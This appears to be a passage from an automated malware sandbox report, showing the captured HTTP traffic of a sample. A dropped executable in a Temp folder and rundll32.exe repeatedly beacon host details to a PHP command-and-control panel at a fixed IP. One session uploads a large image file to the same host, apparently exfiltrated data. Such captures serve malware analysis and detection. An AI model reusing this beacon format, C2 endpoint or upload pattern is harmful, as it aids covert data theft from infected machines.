                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          505176.111.174.11480192.168.2.450053C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.287311077 CEST12598INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          506192.168.2.450054176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.497220039 CEST12599OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          507176.111.174.11480192.168.2.450054C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.604463100 CEST12599INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          508192.168.2.450056176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.834881067 CEST12600OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          509176.111.174.11480192.168.2.450056C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:31.947156906 CEST12600INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          51176.111.174.11480192.168.2.449773C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.643534899 CEST4546INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          510192.168.2.450057176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.168560028 CEST12601OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          511176.111.174.11480192.168.2.450057C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.274554968 CEST12601INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          512192.168.2.450058176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.494080067 CEST12602OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          513176.111.174.11480192.168.2.450058C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.599822044 CEST12602INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          514192.168.2.450059176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.807512045 CEST12603OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          515176.111.174.11480192.168.2.450059C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:32.911221981 CEST12603INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          516192.168.2.450060176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:33.075798035 CEST12617OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:33.170495987 CEST12620OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:33.171531916 CEST12623OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:33.171588898 CEST12631OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:33.171628952 CEST12639OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:33.171684980 CEST12642OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
